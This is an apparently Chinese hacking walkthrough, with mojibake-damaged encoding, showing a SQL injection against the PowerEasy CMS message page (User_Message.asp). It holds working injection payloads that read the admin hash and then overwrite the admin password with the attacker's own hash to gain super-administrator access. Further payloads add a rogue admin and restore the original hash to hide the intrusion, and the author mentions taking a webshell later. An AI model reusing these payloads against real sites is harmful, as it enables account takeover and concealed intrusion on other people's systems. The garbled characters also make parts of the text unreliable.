先注冊(cè)個(gè)號(hào)，進(jìn)入控制面版給自己發(fā)條短信  

http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4  
這就是點(diǎn)```  
用戶(hù)名為admin  奇怪``抓不到```好了抓到了~~~顯示記錄不存在``是因?yàn)?nbsp; 
=沒(méi)有登陸````ef0020cf8c5e45b9 密碼是這個(gè)```  
下面就開(kāi)始將管理員的密碼更新為我注冊(cè)用戶(hù)的密碼````  
利用動(dòng)易爆庫(kù)改庫(kù)程序先將pe_admin里adminname，password字段爆出來(lái).....  
);update pe_admin set password=(select userpassword from pe_user 
 where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b) 
%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--  
這語(yǔ)句的意思就是將PE——ADMIN表中ID=1的用戶(hù)的密碼更新為PE_USER表中 user的密碼```好``現(xiàn)在來(lái)看```需要將hack520轉(zhuǎn)char  
更新成功`~~~~現(xiàn)在已經(jīng)將PE_admin表ID=1的用戶(hù)的密碼更新為hack520的密碼````再看一下```  
53dc3b60f2d40cd4這個(gè)是我前面注冊(cè)的密碼```好現(xiàn)在登陸后臺(tái)看看  
您的用戶(hù)名：admin   
您的身份：超級(jí)管理員   
待閱短信： 1 條   
成功````然后為自己加個(gè)管理員`然后利用以下語(yǔ)句`將管理員的密碼更新回來(lái)  
user  
就是注冊(cè)的用戶(hù)名````````時(shí)間不多```進(jìn)得了后臺(tái)就不管其他的先了````拿WEBSHELL以后再說(shuō)```  
剛剛時(shí)間到了，現(xiàn)在繼續(xù)。。。將管理員密碼改回來(lái).  
);declare @a sysname select @a=0x650066003000300032003000630066 
0038006300350065003400350062003900 update pe_admin set passwo 
rd=@a--  這個(gè)要轉(zhuǎn)一下  

更新```把管理員密碼改回來(lái)  OK我們?cè)倏纯葱薷某晒](méi)```ef0020cf8c5e45b9這個(gè)是原來(lái)的密碼吧？  
好了就到此結(jié)束！ 

最新評(píng)論